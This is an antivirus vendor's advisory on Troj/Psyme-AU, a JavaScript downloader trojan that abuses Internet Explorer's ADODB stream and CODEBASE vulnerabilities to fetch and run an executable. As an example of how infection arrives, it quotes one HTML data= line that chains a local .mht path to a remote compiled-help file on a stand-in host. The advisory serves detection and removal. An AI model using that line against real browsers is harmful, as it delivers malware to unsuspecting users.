Troj/Psyme-AU

Category	Viruses and Spyware
Type	Trojan
What to do	If you've received an alert for a virus or spyware, then follow the instructions for removing the threat.
Prevalence	low high

Summary

Summary
Action
More Information


Affected operating systems	Windows
Protection available since	14 September 2004 08:11:14 (GMT)
Detected by	All Sophos products

Free virus scan
Download the Threat Detection Test

Free virus, spyware, and adware scan
Test your existing anti-virus protection
Find threats your anti-virus missed

Action

Summary
Action
More Information

Please follow the instructions for removing Trojans.

More Information

Summary
Action
More Information

Troj/Psyme-AU is a JavaScript downloader Trojan (usually HTML-based) which exploits the ADODB stream and CODEBASE vulnerabilties associated with Microsoft Internet Explorer to silently download a file from a remote website to C:\Recycled\Q330995.exe on the local computer and run it.

Troj/Psyme-AU can arrive on the computer by browsing websites whose HTML pages
contain the script or by loading a HTML page that contains a link to an infected page. For example a HTML page may contain:

data=html:file://c:\\nosuch.mht!http://unknown.com/online.chm::/1.htm

where online.chm is a compiled HTML help file containing 1.htm and 1.htm is a HTML file containing the Troj/Psyme-AU script.

Known versions of Troj/Psyme-AU download and run Troj/StartPa-BM. For further information please refer to the Troj/StartPa-BM description.

Get reports about the latest virus and spyware threats delivered to your computer

In this section

Troj/Psyme-AU

Summary

Action

More Information